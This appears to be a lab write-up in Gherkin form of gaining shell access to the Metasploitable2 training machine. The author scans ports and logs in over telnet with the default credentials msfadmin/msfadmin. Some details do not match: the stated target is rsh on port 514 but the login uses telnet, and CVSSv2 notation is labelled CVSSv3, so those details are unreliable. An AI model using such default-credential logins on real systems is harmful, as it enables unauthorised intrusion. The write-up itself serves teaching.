## Version 1.4.1
## language: en

Feature:
  TOE:
    metasploitable2
  Location:
    192.168.1.201:514
  CWE:
    CWE-255-Credentials Management
  Rule:
    REQ.142 Change system default credentials.
  Goal:
    Get remote shell on the machine
  Recommendation:
    Change system default credentials.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ParrotSec       | 4.19.0      |
    | Metasploit      | 5.0.4-dev   |
  TOE information:
    Given I am scanning the server 192.168.1.201
    And RSH is open on port 514
    And is running on Ubuntu 2.6.24

  Scenario: Normal use case
  Users can login into the remote machine by telnet
    Given I scan the server
    Then I can see that the port is open
    """
    PORT  STATE  SERVICE
    513/TCP open login
    514/TCP open shell
    2049/TCP open nfs
    """

  Scenario: Static detection
  No code given

  Scenario: Dynamic detection
  Rsh allows me to login directly to the machine and get a shell.
    Given the server have an open rsh port.
    Then I can execute the following command:
    """
    nmap 192.168.1.201
    """
    Then I get the output:
    """
    PORT  STATE  SERVICE
    445/TCP open microsoft-ds
    513/TCP open login
    514/TCP open shell
    2049/TCP open nfs
    2121/TCP open ccproxy-ftp
    """
    Then I can conclude that rsh service is open and listening.

  Scenario: Exploitation
  In order to get in to the server we need to exploit the vulnerability.
    Given the server rsh service is open without restriction.
    And the server is using an outdated software.
    Then I can execute the following command:
    """
    $ telnet 192.168.1.201
    """
    Then I get the output:
    """
    Trying 192.168.1.201...
    Connected to 192.168.1.201
    Escape character is '^]'.
    Login with msfadmin/msfadmin to get started

    """
    Then I used msfadmin as user and pass
    Then I can conclude that I got access to the server

  Scenario: Remediation
  No code given

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9/10 (high) - AV:N/AC:L/Au:S/C:C/I:C/A:C
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.5/10 (high) - E:H/RL:W/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.3/10 (high) - CDP:H/TD:H/CR:H/IR:H/AR:H
